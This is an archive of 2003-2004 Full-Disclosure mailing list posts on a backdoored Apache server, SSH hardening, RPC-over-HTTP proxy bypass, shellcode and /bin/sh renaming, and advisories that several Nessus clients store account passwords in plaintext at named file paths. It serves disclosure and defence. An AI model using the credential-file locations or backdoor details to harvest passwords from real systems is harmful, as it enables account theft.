 /bin/sh No connect
 Looking up %s... Failed!
 OK
 %u Connect Back
 
 I don't know if the hacker installs in this machine a rootkit, but the check
 of md5sum of
 ls, lsof, ps, netstat binaries with other ones from a clean Mandrake distr.
 was good...

I assume you used a bootable CD on the infected machine to do the checksums?


 The main problem is finding how the Apache Server (or PHP) was altered by
 the hacker,
 because every user that connects to this host now, could be infected by
 several HTML/IE recent exploits.

Check the httpd.conf (and other apache configuration files) for any
changes, and also the contents of each module loaded.  It's also
possilble, but less likely, that the injection is done in a kernel
module.


 Sniffing an HTTP packet from this host, I've found that *SOMETIMES* (in a
 random way??)
 web server inserts a special javascript between HTTP-Header and served page.

Sounds like a good time to replace the entire server with a fresh build.


Kevin

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] RE: [Full-Disclosure]Open the doors to hell hire a hicker Full-Disclosure Posts

2004-10-18 Thread Kevin
On Mon, 18 Oct 2004 10:28:39 -0400, Clairmont, Jan M
[EMAIL PROTECTED] wrote:
 Oh yeah and we can trust you bozos not to put in backdoors, sploits and other
 great modes of entry yeah right. 8-, Hire the burgler to secure your home,
 yeah right? Doh!

Just because J.Random Hacker starts out as an immature 17 year old
script kiddie breaking into random systems doesn't mean  (assume he
avoids prison) he can't grow up to become a mature security
professional who knows how to follow a policy procedure, comply with
audit, and work a 9-to-5 job.

Scratch a thirty-something lead InfoSec consultant from any major
consulting firm (including the big four), and chances are you'll find
a 31337 Hax0r from the 90's.

And this is excluding the obvious L0pht-@Stake-Symantec progression.
 People mature over time, grow into a more professional attitude
without losing the inventiveness and insight that makes them
effective.


 Sheessh what a stupid idea?
 
 The whole point of hiring people who don't know much is that they follow
 a policy procedure and comply with audit, I have yet to see a Hck3r follow any
 procedure.  So how do you control anything such as policy etc, the wild west again?
 You hire professional security people to maintain control, not chaos, and find 
 methodologies
 procedures and products that are the most effective, test, re-test, remediate, 
 deploy and defend.
 And that can be maintained and operated by ordinary computer folk, who want to do an 
 honest days
 work and collect their rightful pay, but maybe you never thought of that!

Sure, bean counters have their place too.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] RE: [Full-Disclosure]Open the doors to hell hire a hicker Full-Disclosure Posts

2004-10-18 Thread Kevin
On Mon, 18 Oct 2004 19:25:16 -0400, Micheal Espinola Jr
[EMAIL PROTECTED] wrote:
 Yea, but the l0pht was never an exploit group.  They were the most
 true hackers I have ever personally known.
 
 But it should also be considered that way back then, the youngest
 member was in his teens, while the rest were significantly older than
 him.  Now, that youngest member (Kingpin) should be about 30 y/o.
 
 Their maturity and _responsibility_ to their passions has always kept
 them a cut above in the professional game.

What I was trying to say is that there are other less visible success
stories of hacker turned information security professional, that not
all of the guys who were innovative in the pre-WWW days drifted off to
become old stoner geeks (well, some did), but many actually matured
into responsible adults with a job, a mortgage, and a strong sense of
ethics and self control... and a passion for a good hack.

 On Mon, 18 Oct 2004 17:38:18 -0500, Kevin [EMAIL PROTECTED] wrote:
Scratch a thirty-something lead InfoSec consultant from any major
consulting firm (including the big four), and chances are you'll find
a 31337 Hax0r from the 90's.

And this is excluding the obvious L0pht-@Stake-Symantec progression
 ^^^
Yes,  L0pht a highly visible example,  but not the sole exception to
the rule; there are more than a few individuals who, seeing their name
in an industry journal, the first thing that comes to my mind is not
the respected consulting firm they work for now, but the hacker handle
they used back in the old h/p/v scene.

Kevin

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Any update on SSH brute force attempts?

2004-10-15 Thread Kevin
On Sat, 16 Oct 2004 14:57:31 +1300, James Riden [EMAIL PROTECTED] wrote:
 Jay Libove [EMAIL PROTECTED] writes:
  What are you doing/changing about your SSH configurations to reduce the
  possibility of these attacks finding any kind of hole in the OpenSSH
  software (that's what I run, so that's the only version I'm particularly
  concerned about) ?  Are you doing anything at all?

Use one time passwords (OTP, e.g. S/Key).
Restrict which addresses are allowed to connect (via
/etc/hosts.allow), and/or which user accounts are allowed from which
sources (using AllowUsers in sshd_config).

I l prefer to bind the listener to a specific IP address on hosts with
multiple addresses, the BOFH might choose to have a  tarpit *:22/TCP
listener on hosts with many alias IPs..


 One or more of the following, depending on local requirements:
 
 * Run on a non-standard port - this will stop brain-dead scanning programs
 * Use key-based auth instead of passwords
 * Restrict what IP addresses are allowed to connect (at your firewall)
 * Disable root logins
 * Use john or crack to audit password strength
 * Use logwatch or similar to monitor failed login attempts
 * Make a honeypot and see what techniques people are trying out
 
 (Everyone's forcing version 2 of the protocol, right?)

$ sudo tail -5 /etc/ssh/sshd_config
Protocol 2
ListenAddress 172.23.97.2
MaxAuthTries 2
PermitRootLogin no
LogLevel VERBOSE
$ exit

I'm sorely tempted to forgo SSH for telnet encapsulated in SSL (via
stunnel), with non-reusable passwords.  Anybody else remember Stel?

Kevin

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Possibly a stupid question RPC over HTTP

2004-10-14 Thread Kevin
On Wed, 13 Oct 2004 15:33:13 -0700 (PDT), S G Masood [EMAIL PROTECTED] wrote:
 Yeah, it certainly is a security risk in several ways.
 Decoding and inspecting HTTPS traffic at the perimeter
 before it reaches the server becomes an absolute
 necessity if RPC over HTTPS is implemented. Same with
 RPC over HTTP.

There was a Microsoft employee on-site for a few days this summer, and
I noticed one day that he was reading MS email messages in Outlook
2003 (not OWA) from his laptop while connected to *our* private LAN.

Any smart enterprise blocks all POP/IMAP/MAPI protocols both inbound
and outbound, so this made me more than a bit suspicious...  When I
checked the proxy traffic from the DHCP address assigned to his
laptop, I saw normal-lookup HTTP requests followed by additional RPC
headers.  Turns out the employee he was working with helpfully gave
him the information to use the outbound proxy, and after configuring
proxy settings in the control panel, it just worked.

Our visitor went back to Redmond before I could get approval from
management to modify the firewall configuration to explicitly block
RPC-over-HTTP :(

Kevin

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Clear text password exposure in Datakey's tokens and smartcards

2004-08-05 Thread Kevin Sheldrake
Surely if the user is entering a passphrase then the same problem exists -  
that of effectively eavesdropping that communication from the keyboard?

Ignoring the initial expense for a moment, wouldn't it have made a lot of  
sense to include the keypad actually on the cards?  Obviously, card  
readers would need to be contructed such that the keypad part of the card  
would be exposed during use.  The keypad security could then rely on the  
tamper resistant properties of the rest of the card.

From a costs perspective, I would guess that the actual per-card cost  
increase would be minimal if hundreds of millions of these cards were  
produced.

Kev

Lionel Ferette wrote:
Note that this is true for almost all card readers on the market, not  
only for Datakey's. Having worked for companies using crypto smart  
cards, I have conducted a few risk analysis about that. The conclusion  
has always been that if the PIN must be entered from a PC, and the  
attacker has means to install software on the system (through directed  
viruses, social engineering, etc), the game's over.
 The only solution against that problem is to have the PIN entered  
using a keypad on the reader. Only then does the cost of an attack  
raise significantly. But that is opening another can of worms, because  
there is (was?) no standard for card readers with attached pin pad (at  
the time, PC/SCv2 wasn't finalised - is it?).

at least some cards are supporting des passphrases to implement secured  
communication channels but I suppose this feature is not that widely in  
use  how many card owners are prepared to remember both PIN codes  
and passphrases...

toomas


--
Kevin Sheldrake MEng MIEE CEng CISSP
Electric Cat (Bournemouth) Ltd
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #1767 - 14 msgs

2004-07-14 Thread Holcomb, Kevin
This makes no sense..  YOur saying I emailed a virus?  The bank firewall will not 
allow me to email a virus I dont think.  

Thanks,
 
Kevin Holcomb 
W2K System Administrator/Database Administrator
Bank of America
Decision Support Applications (DSA): Campaign Execution and Reporting (CER)
kevin.holcomb@ bankofamerica.com
(w) 704-388-7361  (c) 704-309-6178
(pager) 877-385-0652 
---
Confidentiality Statement: This message is for the designated recipient only and may 
contain privileged, proprietary, or otherwise private information. If you are not the 
intended recipient, you may not copy, disclose, or distribute this message to anyone. 
If you have received it in error, please notify the sender immediately and delete the 
original. Any other use of the e-mail by you is prohibited.
---
 


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of
[EMAIL PROTECTED]
Sent: Wednesday, July 14, 2004 10:57 AM
To: [EMAIL PROTECTED]
Subject: Full-Disclosure digest, Vol 1 #1767 - 14 msgs


The original message content contained a virus or was blocked due to blocking rules 
and has been removed.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Mozilla Security Advisory 2004-07-08

2004-07-09 Thread Wall, Kevin
Dan Veditz wrote in the Mozilla Security Advisory, dated July 7, 2004...

 Solution:
 We urge people to install the patch available on mozilla.org or
 install the latest version of the software.
 
 http://www.mozilla.org/security/shell.html
 
 -Dan Veditz
 Mozilla Security Group 

Well done, Mozilla Security team. Meanwhile, it will probably be
another 6 months until MS gets around admitting this is a legitimate
problem in IE and getting a fix available (unless it happens to be
fixed in WinXP SP2, coming RSN to a PC near you ;-).

Responsive like this is one of the main reasons that I use Mozilla
whenever possible.
-kevin wall
Qwest IT - Application Security Team

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] No shell = secure?

2004-07-09 Thread Wall, Kevin
Matthias Benkmann wrote...

 I can't say I've looked at much exploit-code so far but the POC exploits
 to gain root I've seen for Linux all executed /bin/sh. I'd like to know if
 this is true for in-the-wild exploits to root a box, too. If so, would it
 be a useful security measure to rename /bin/sh and other shells (after
 making sure that everything that needs them has been updated to the new
 name, of course)?

No; sometimes they use other shells, such as /bin/bash, /bin/ash,
/bin/zsh, etc. or else execute a single command at a time.

Also, presumably, you'd still have to set SHELL env variable, so
they could presumably just execute $SHELL in many cases.

Worst of all, you now have yourself a maintenance nightmare. Think
of how many shell scripts where you'd have to change the

#!/bin/sh

to whatever full path name you've switched the shell to. And you'd have
to do this whenever you install a vendor update, an RPM, etc.

Yuck! No thanks!

 I'm aware that a dedicated attacker who targets my box specifically will
 not be stopped by this but I don't think I have such enemies. I also know
 that DOS is still possible, but that's also not my concern. I'm simply
 worried about script kiddies using standard exploits against random
 servers on the Internet rooting my box faster than I can patch it.

Well, it probably would stop the script kiddies--for awhile at least.
But see above.

Also, if you keep on top of patches, have appropriate firewall rules
and other access control mechanisms in place, script kiddies are
not all that hard to keep out.

 If renaming the shell is not enough, how about renaming all of the
 standard Unix top-level directories (such as /bin, /etc,...)? Would that
 defeat standard exploits to root a box?

Man, that would REALLY become a maintenance nightmare. You'd have to
customize almost all RPMs, vendor patches, etc. before installing
them.
---
-kevin wall
Qwest IT - Application Security Team
The reason you have people breaking into your software all 
over the place is because your software sucks...
 -- Former whitehouse cybersecurity advisor, Richard Clarke,
at eWeek Security Summit

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] No shell = secure?

2004-07-09 Thread Kevin Ponds
As has been discussed, really all you're doing is preventing against
canned exploits.

You're also going to be jumping ALOT of hoops to do this.


There are different ways to achieve the same result, look into canary
stack protection (such as propolice), and a write or execute stack,
such as W^X on OpenBSD or PaX on Linux.Applying one of these will
at least force an attacker to write a custom exploit for your
configuration, and will give you alot less headaches than running
without shells or renaming file structure.

However as has been said many times before, security through obscurity
isn't really security at all.  It can buy you time and deter alot of
folks, but it won't make you secure.

Ponds

On Fri, 9 Jul 2004 21:14:07 +0545, npguy [EMAIL PROTECTED] wrote:
 On Friday 09 July 2004 08:19 am, hax wrote:
  2)  That'd stop a lot of skript kiddies, I guess, but it'd be pretty
  trivial to just rework the shellcode to call some other command
  instead of /bin/sh.
 
 if this is single target. attacker can guess your setting and keeping
 executing any commands it could possible target to execute more attack
 what about wget from shellcode.
 
 
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Re: USB risks (continued)

2004-06-19 Thread Kevin Davis
Many USB keys have hardware switches to make them read only.  With Windows
2000 or Windows XP, no special drivers are required to read USB keys.

Autorun works on removable USB CD drives.

- Original Message - 
From: RSnake [EMAIL PROTECTED]
To: Gadi Evron [EMAIL PROTECTED]
Cc: Harlan Carvey [EMAIL PROTECTED];
[EMAIL PROTECTED]; [EMAIL PROTECTED]
Sent: Friday, June 18, 2004 7:54 PM
Subject: Re: USB risks (continued)



 Autorun doesn't work with USB keyfobs.  Actually, it is my
 understanding that it doesn't work on any media that is deemed writable
and
 removable.  The distinction between USB devices and CDs is that the media
is
 writeable, but the drives aren't removeable on CDs.  That of course isn't
true
 if you have a USB drive, but I think part of the deal there is that you
need to
 install special drivers to even read USB CD drives.  That's kinda a weird
 distinction, but I researched it quite a bit earlier this year and that's
just
 how they define it.  With the advent of bootable USB devices, and more USB
 support, you can pretty much bet things will change, but for right now,
autorun
 isn't an issue.


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Imaging Operating Systems

2004-05-27 Thread Kevin Connolly
Maarten wrote:
This is an interesting thread...  But out of curiosity, is it also possible to 
do backup / restores using readily available linux tools? 
I'd like to be able to do something like running dd over a network connection, 
or tar, or whatever other tool.  In that case, a bootable CD is all you need.
But I'm unsure how to do that...

Maarten
one suggestion
make the PC dual boot: Windows and Linux
with the Linux partition larger.
boot Linux and dd the raw Windows partition to a Linux file
boot Windows and play with malware
boot Linux and dd the file back out to the Windows partition
rince and repeat...
I used this method some years back with Win95 and FreeBSD
but I had a very small Win95 partition.
See also: www.feyrer.de/g4u/Ghost for Unix
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Nessus stores credentials in plain text

2004-03-28 Thread ~Kevin Davis³
Q.  Does Nessus use username and password data and store it in plaintext
locally even after the client connections are long gone?

A. Yes.


If is not ok for vulnerability scanners like ISS and others to do this, why
is it ok for Nessus to do this?

- Original Message - 
From: Raymond Morsman [EMAIL PROTECTED]
To: ~Kevin Davis³ [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Sunday, March 28, 2004 4:27 PM
Subject: Re: [Full-Disclosure] Nessus stores credentials in plain text


 On Sat, 2004-03-27 at 17:47, ~Kevin Davis³ wrote:
  Many people would disagree that storing passwords in plaintext is not a
  vulnerability.  This includes entities like ISS who were doing the same
  thing and once realized it changed it.  I don't see how a plaintext
username
  and
  password is simply system data and not also credentials.  And guess
what?
  Nessus itself has several plugins that check for plaintext passwords in
  other applications.

 Q: Does Nessus use this data for its own persona-check?
 A: No, it uses it for client connections.

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Nessus stores credentials in plain text

2004-03-27 Thread ~Kevin Davis³
Many people would disagree that storing passwords in plaintext is not a
vulnerability.  This includes entities like ISS who werre doing the same
thing and once realized it changed it.  For many, it is not a matter of
merely being nice to encrypt plaintext passwords, but a requirement.  You
are giving the keys to the kingdom away for free here.

- Original Message - 
From: Raymond Morsman [EMAIL PROTECTED]
To: ~Kevin Davis³ [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Saturday, March 27, 2004 4:08 AM
Subject: Re: [Full-Disclosure] Nessus stores credentials in plain text


 On Sat, 2004-03-27 at 06:01, ~Kevin Davis³ wrote:
  I have posted this issue to a couple entities like bugtraq and CERT
  with no response.  I mentioned this issue to an organization

 And so it should be. These are not vulnerabilities in the pure sense of
 the word.

 What you call credentials are nothing more than system data for Nessus
 and therefore not an issue for Nessus.

 You can't use MD5 on systemdata.

 However, I must agree that it would be nice if this information would be
 encrypted with the users password.

 Raymond.

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Nessus stores credentials in plain text

2004-03-27 Thread ~Kevin Davis³
Many people would disagree that storing passwords in plaintext is not a
vulnerability.  This includes entities like ISS who were doing the same
thing and once realized it changed it.  I don't see how a plaintext username
and
password is simply system data and not also credentials.  And guess what?
Nessus itself has several plugins that check for plaintext passwords in
other applications.
I guess it has a different standard for itself as opposed to other
applications.  For many,
it is not a matter of merely being nice to encrypt plaintext passwords,
but a
requirement.  You are giving the keys to the kingdom away almost for free
here.


 - Original Message - 
 From: Raymond Morsman [EMAIL PROTECTED]
 To: ~Kevin Davis³ [EMAIL PROTECTED]
 Cc: [EMAIL PROTECTED]
 Sent: Saturday, March 27, 2004 4:08 AM
 Subject: Re: [Full-Disclosure] Nessus stores credentials in plain text


  On Sat, 2004-03-27 at 06:01, ~Kevin Davis³ wrote:
   I have posted this issue to a couple entities like bugtraq and CERT
   with no response.  I mentioned this issue to an organization
 
  And so it should be. These are not vulnerabilities in the pure sense of
  the word.
 
  What you call credentials are nothing more than system data for Nessus
  and therefore not an issue for Nessus.
 
  You can't use MD5 on systemdata.
 
  However, I must agree that it would be nice if this information would be
  encrypted with the users password.
 
  Raymond.
 
  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.netsys.com/full-disclosure-charter.html


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Nessus stores credentials in plain text

2004-03-26 Thread ~Kevin Davis



I have posted this issue to a couple entities like bugtraq and 
CERT with no response. I mentioned this issue to an organization today 
which was considering using Nessus as a vulnerability scanner to assess their 
network security issues and this was in violation with their security policy so 
they are reconsidering using it. Please read below...


Software Vendor: Nessus (www.nessus.org)Software Package: Nessus 
Versions Affected: 2.0.10a (possibly others)Synopsis: Username and 
password for various accounts stored in unencrypted plain text

Issue Date: Feb 22, 2004

Vendor Response: Vendor notified December 4, 
2003 Vendor declined to resolve issue 



1. Summary

The open source Nessus Vulnerability scanner stores the 
credentials ofvarious types of accounts in unencrypted plain text in a 
configuration file. 

2. Problem Description

The .nessusrc files stores username and password information 
for various types of accounts in unencrypted plain text. Those 
parameters are typically set from the native nessus client but also can be 
added manually. When setting these parmetersfrom the Nessus client, 
the user is also not informed of this sensitive informationbeing stored 
insecurely. This potentially affects the following types of 
accounts:

FTPIMAPPOP2POP3NNTPSNMPSMB (Windows NT 
Domain)

3. Solution

None at this time. A lengthy discussion with the vendor 
resulted in the vendor's decision that this was not a security risk that 
warrants resolution on. 




[Full-Disclosure] NEWT Scanner stores credentials in plain text

2004-03-26 Thread ~Kevin Davis




I have posted this issue to a couple entities like NTbugtraq 
and CERT with no response. Please read 
below...


Software Vendor: Tenable Security (www.tenablesecurity.com)Software 
Package: Newt Versions Affected: 1.4 and earlier (and possibly 
1.5)Synopsis: Username and password for various accounts stored in 
unencrypted plain text

Issue Date: Feb 22, 2004

Vendor Response: Vendor notified December 4, 
2003 Vendor declined to resolve issue 



1. Summary

NEWT is a commercial Windows port of the open source Nessus 
Vulnerability scanner byTenable security. Newt stores the credentials 
of various types of accounts in unencrypted plain text in a configuration 
file. 

2. Problem Description

The config.xml files stores username and password information 
for various types of accounts in unencrypted plain text. Those 
parameters are typically set from the NEWT Scanner interface. When 
setting these parameters, the user is also not informed of this sensitive 
information being stored insecurely. This potentially affects the 
following types of accounts:

FTPIMAPPOP2POP3NNTPSNMPSMB (Windows NT 
Domain)

Typically this config file is stored locally at the following 
location:

\Documents and 
Settings\Username\Tenable\NeWT\config\config.xml

3. Solution

None at this time. A lengthy discussion with the vendor 
resulted in the vendor's decision that this was not a security risk that 
warrants resolution on. 




[Full-Disclosure] NessusWX stores credentials in plain text

2004-03-26 Thread ~Kevin Davis




Software Vendor: NessusWX (nessuswx.nessus.org)Software 
Package: NessusWX Versions Affected: 1.4.4 and possibly earlier 
versionsSynopsis: Username and password for various accounts stored in 
unencrypted plain text

Issue Date: Feb 22, 2004

Vendor Response: Vendor notified December 4, 
2003 Vendor claiming to be working on issue 



1. Summary

NesussWX is a GPL Windows client for the open source Nessus 
Vulnerability scanner. NessusWX stores the credentials of various 
types of accounts in unencrypted plain text in a configuration file. 


2. Problem Description

The user saves specific scan configuration settings in 
sessions created withinNessusWX. For every session a directory is 
created named the same as thesession name with a .session appended to 
it. For instance in the case of asession named MySession, the default 
location for the session configurationfiles would be in the directory 
C:\NessusDB\MySession.session. Every sessioncan save unique Nessus 
plugin configuration settings. Among these areusername/password 
settings for various types of accounts. These options are accessed by 
selecting a session, and then in the main menu under "Session" selecting the 
"Properties" submenu. This will display a multi-tabbed dialog. 
Select the "Plugins" tab and then click on the "Configure Plugins" 
button. A listbox will be displayed and near the bottom of the list 
there will be an item named "Login Configurations". When the user 
saves this logon information, both the usernames and passwords are saved in 
plaintext in the above specified path in a file named preferences. 
Further,after this information is saved to the file, if the user goes back 
and removes this information using the GUI, the user interface indicates that 
the information has been removed but this is misleading because it is 
stillretained in the configuration file. This behavior is somewhat 
inconsistent.Sometimes the entire username/password data is retained in the 
file andsometimes the first character of each is removed. When setting 
these parameters, the user is also not informed of this sensitive 
information being stored insecurely. This potentially affects the 
following types of accounts:

FTPIMAPPOP2POP3NNTPSNMPSMB (Windows NT 
Domain)

3. Solution

None at this time. The vendor agreed to fix the problem 
by allowing the user to password protect the data and also have the data 
removed properly. It has been over 60 days and the patch has not been 
made available. 




Re: [Full-Disclosure] stenagrophy software recommendations

2004-03-24 Thread Kevin Warren Ponds
We use S-Tools in my security class, it seems to work out well, unzipped
is like 500k, drag and drop gui.

 stenographic encryption program.

Steg is not crypto, although they are very often used in tandem.  However,
S-Tools can also do symmetric crypto with a few good ciphers.


-ponds

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] RE: What's wrong with this picture?

2004-02-26 Thread Wall, Kevin
 Somebody want to explain to this guy that there's a difference between
 publicly available exploits and 0-day exploits circulating 
 in the underground?
 
 http://news.bbc.co.uk/1/hi/technology/3485972.stm
 
 Scary part is that he's a high honcho at Microsoft's security unit.

So, I see... according to Mr. Aucsmith's logic, if we NEVER issue
security patches, we'll have LESS security vulnerabilities. Yeah, right.
Boy, guess we're all out of a job then. (Actually, it's attitudes like
this that will keep us employed for a very long time. ;-)
-kevin
---
Kevin W. Wall   Qwest Information Technology, Inc.
int i;  /* WARNING: This code may be intellectual property of
SCO.
 *  Use at your own risk!
 */

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Absurd Microsoft QA? The Return of the username@password...

2004-02-12 Thread Kevin Sullivan
* Here's the final straw…  On February 10, 2004…  Microsoft released
 a patch that…  restores the [EMAIL PROTECTED]: functionality in URL
references!
 * It seems they are trying to hide this fact as this is not
widely publicized and it is NOT being labeled as an IE patch nor a even
a security patch!
Probably because it is NOT a security patch, nor does it restore the
embedded-credentials functionality. It addresses the specific problem
(created by the 04 patch )of not being able to pass user credentials in
an XML Open() call.
From the M$ article:
This fix will only enable the scenario where user credentials are passed as
parameters in the Open() method call. It will not enable scenarios where
the user credentials are embedded in the URL.
Ks 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] DreamFTP Server 1.02 Buffer Overflow

2004-02-07 Thread Kevin Gerry
Tsk- Quit being a security expert and just listen to the vulns as they come 
in like a good puppy ^^

Anyhow... Yeah... What's with that? . Call an orange an orange. Not a dog. 
(Not you Bill- The original poster)

~

So, that would be a format string vuln, not a buffer overflow, right?

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Interesting side effect of the new IE patch

2004-02-04 Thread Kevin Gerry
Actually- there is a registry key you can put in to change back to the 
'correct' user:[EMAIL PROTECTED] way of processing... So it DOES still have that in 
there to follow RFC- Just needs to be activated first.

(It's in a newer KB article.)

~

- Original Message - 
From: Andreas 'GlaDiaC' Schneider [EMAIL PROTECTED]
To: Schmehl, Paul L [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Wednesday, February 04, 2004 6:00 PM
Subject: Re: [Full-Disclosure] Interesting side effect of the new IE patch


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
The Netscape project is dead... you should check the Mozilla Suite or
Mozilla Firebird :)
http://www.mozilla.org/

Schmehl, Paul L wrote:
| Since the IE browser no longer allows the @ sign in a uri, you can no
| longer download files from some vendors' sites.  Still works in Netscape
| 7.1, however.  So far I've found three sites, but I haven't done an
| extensive investigation.  These are just ones that I've stumbled across.
| The most interesting one is NAI's download site for enterprise licensed
| software packages.  (I suppose, if one was ambitious, one could google
| for @?)
|
| I wonder how many other vendors are cheating on the RFCs to facilitate
| browser interaction?
|
| Paul Schmehl ([EMAIL PROTECTED])
| Adjunct Information Security Officer
| The University of Texas at Dallas
| AVIEN Founding Member
| http://www.utdallas.edu/~pauls/
|
| ___
| Full-Disclosure - We believe in it.
| Charter: http://lists.netsys.com/full-disclosure-charter.html
|
|
- --
http://www.linux-gamers.net - your online gaming resource
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.2 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org
iD8DBQFAIXmLf94+j/M+P8YRAoW/AJ97D0iN5k/ETOaDgX6zKw6bMyJ1HwCggj7u
gPbxDI92Lv7A2kcU9vnQKYU=
=oTA2
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] antivirus s/w

2004-01-27 Thread Kevin Cherry
One product you might want to look into is Cisco Security Agent or CSA.
CSA runs on all NT Class machines and works as a kind of a Personal
Firewall.  It does this through OS behavior monitoring and then reports
any suspicious activity to a centralized console called VMS.  The VMS
console can read the log information leading up to a successful block
and compare that information from other CSA agents running on other
machines to determine if a new rule needs to be generated and pushed out
to the clients to block a new worm or attack that may be active on your
network.  CSA's rules can be customized down to a very detailed level
and provides a proactive approach for combating new viruses and system
compromise attempts and it does not need any definitions to do so,
because it works by monitoring OS behavior.  CSA will also work in
combination with Cisco VPN concentrators by only allowing machines that
have CSA running to connect to the VPN.  Here are some links for more
info.

http://www.cisco.com/en/US/products/sw/secursw/ps5057/index.html

http://www.cisco.com/en/US/products/sw/cscowork/ps2330/

If I made any mistakes in my description please let me know as I only
told this information at Cisco Security Seminar and I may have forgot
some things 
or explained them incorrectly.


Kevin




-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Gadi Evron
Sent: Tuesday, January 27, 2004 5:10 AM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] antivirus s/w

Patrick J Okui wrote:

  Hi all,
 
  (.*flames.*/dev/null)
 
  1. I'm trying to decide on an AV solution for a campus wide n/w.
  I'm basically looking for something that'll respond as quick as
  possible to new viruses. I'm currently evaluating NAV, and Fprot.
  Any other suggestions/recomendations?

To install on every workstation or to filter malware from email?

 
  2. Fprot have an AV 4 linux/bsd workstationsdoes this just
  scan for virii from infected winbloze or are there un*x virii i'm
  ignorant about?

A better question would be.. rootkits?

Gadi Evron




___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] antivirus s/w

2004-01-27 Thread Kevin Patterson
Try trend Micro.

-Original Message-
From: Randal L. Schwartz [mailto:[EMAIL PROTECTED]
Sent: Tuesday, January 27, 2004 9:52 AM
To: Patrick J Okui
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] antivirus s/w


 Patrick == Patrick J Okui [EMAIL PROTECTED] writes:

Patrick Hi all,
Patrick (.*flames.*/dev/null)

Patrick 1. I'm trying to decide on an AV solution for a campus wide n/w.
Patrick I'm basically looking for something that'll respond as quick as
Patrick possible to new viruses. I'm currently evaluating NAV, and Fprot.
Patrick Any other suggestions/recomendations?

PLEASE MAKE SURE that it doesn't send email responses.

I'm getting 500 mydoom an hour.  I can filter those.
I'm getting 1500 AV-responses an hour.  I can't filter those.

AV response email is PART OF THE PROBLEM now, not PART OF THE SOLUTION.

-- 
Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095
[EMAIL PROTECTED] URL:http://www.stonehenge.com/merlyn/
Perl/Unix/security consulting, Technical writing, Comedy, etc. etc.
See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training!

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server Overflow Exploit

2003-12-19 Thread Kevin Mitnick
Hi all!


I'm sorry for my absence from the list for the past few months, but I have
been very busy traveling outside the US, and my mail account was
experiencing problems.  Now that I am receiving the messages again, I have
been playing catch up, by reading the old posts.

I do have some good news, and was hoping that some of you might be able to
assist me.  I have been commissioned by Wiley  Sons to write a second book,
which is tentatively titled, The Art of Intrusion.  This book will
chronicle detailed accounts of real, untold hacks by the perpetrators who
did it, and I will provide a security analysis and described how the attack
could be mitigated/prevented in today's environment.  I am going to tell the
story from the perpetrator's stance, not just from research obtained from
law enforcement officials and records.

I am looking for former/retired hackers that would be willing to tell me the
details of their sexiest hack.  I am not interested in the run-of-the-mill
attacks such as, exploiting RPC DCOM, but rather creative ones that
incorporated technical, physical and/or social engineering aspects.

 

